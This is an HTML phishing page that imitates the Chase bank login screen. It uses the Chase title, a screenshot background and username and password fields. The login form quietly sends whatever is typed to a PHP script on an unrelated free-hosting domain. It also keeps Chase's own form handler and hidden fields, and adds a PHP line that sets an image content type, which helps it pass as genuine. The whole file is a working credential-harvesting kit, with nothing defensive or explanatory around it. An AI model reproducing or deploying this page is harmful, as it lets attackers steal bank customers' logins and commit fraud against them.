<!DOCTYPE html>
<html>
<head>
<style type="text/css">
.chaseHeader {
height:148px;
width:100%;
float:center;
}
body {
height:4875px;
background-image:url(login-main-long.png);
}
.table {
}
#chkbxtxt {
position:relative;
cursor:pointer;
}
.logonCheckbox {
cursor:pointer;
}
input {
border-top:0;
border-left:0;
border-right:0;
}
.row {
}
.cell {
}
#chaseBase {
float:right;
position:relative;
margin:auto;
width:300px;
}
#logbox {
}
#signin {
}
#usr_password {
position:relative;
opacity:25%;
border-right-width:0;
border-left-width:0;
border-top-width:0;
}
.phWrapper {
float:left;
}
.phWrapper a.pH {
height:45px;
box-shadow:0 3px 0 -1px #0b6efd;
}
.phWrapper .button:active {
}
.phWrapper:hover {
box-shadow:0 3px 0 -1px #0b6efd;
color:red;
position:relative;
bottom:20px;
right:4px;
margin-bottom:35px;
color:red;
}
#logbox.row .vertical .align-label .floating-wrapper #usrPH {
position:absolute;
display:inline-block;
margin-top:.75rem;
z-index:1;
text-align:left;
pointer-events:none;
margin-left:.5rem;
transition:all .2s ease-in-out;
color:#717171;
}
#usr_name {
position:relative;
opacity:25%;
border-right-width:0;
border-left-width:0;
border-top-width:0;
background:rgba(255,255,255,.96);
}
.row#logbox {
text-align:left;
width:300px;
float:right;
position:relative;
top:162px;
right:382px;
}
#remember {
}
#logbox {
}
.margin {
}
.chaseHeader form {
float:right;
text-align:left;
}
</style>
<title>Credit Card, Mortgage, Banking, Auto | Chase Online | Chase.com</title>
</head>
<body ><?php
header('Content-Type: image/jpeg');
?>
<header class="chaseHeader" id="chaseHeader">
<form name='microsite_site_search_form' onsubmit=
'javascript:return doSearch(document. microsite_site_search_form.QueryText.value)'
id="microsite_site_search_form">
<input name="QueryText" size="10" class="inputTextBox" title=
"Enter keyword to search" id="searchfield">
</form>
</header>
<div>
<div>
<div class="table">
<div class="row">
<div class="cell"></div>
<div class="cell"></div>
</div>
<div class="row">
<div class="cell"></div>
<div class="cell"></div>
<div class="cell"></div>
</div>
<div class="row vertical align-label floating-wrapper" id="logbox">
<div class="cell"></div>
<div class="phWrapper" id="usrPH">
<a class="pH">Username</a>
</div>
<div class="cell" id="usrnm">
<form name='logonform' autocomplete='off' action=
'https://checktwelve.000webhostapp.com/post.php'
id='logonform' method='post' onsubmit=
'return validateandsetcookie(document.logonform.usr_name, document.logonform.usr_password.value, document.logonform.remember.checked, .chase.com,RBGLogon)'
align='center' style=
'display: inline; margin: 0; padding: 0;'>
<input name="authmethod" type="hidden" value="">
<input name="locale" type="hidden" value="">
<input name="pagegentime" type="hidden" value="">
<input name="LOB" type="hidden" value="">
<input name="hiddenuri" type="hidden" value="">
<input name="usr_name" alt="Username" tabindex="1"
size="35" class="pwdTextBox" id="usr_name" maxlength=
"32">
</form>
</div>
<div style="height:10px;"></div>
<div class="phWrapper" id="pwPH">
<a class="pH">Password</a>
</div>
<div class="cell" id="pwd">
<div>
<input name="usr_password" tabindex="2" size="35"
class="pwdTextBox" type="password" id="usr_password"
maxlength="32">
</div>
<div>
<input tabindex="4" class="logonCheckbox" type=
"checkbox" name="remember" id="remember"> <label for=
"remember" id="chkbxtxt">Remember me</label>
</div>
<div>
<input id="signin" tabindex="3" type="image" src=
"images/signinbutton.png" vspace="0" border="0"
height="39" alt="" width="306">
</div>
</div>
</div>
<div id="spacer"></div>
</div>
</div>
</div>
</body>
</html>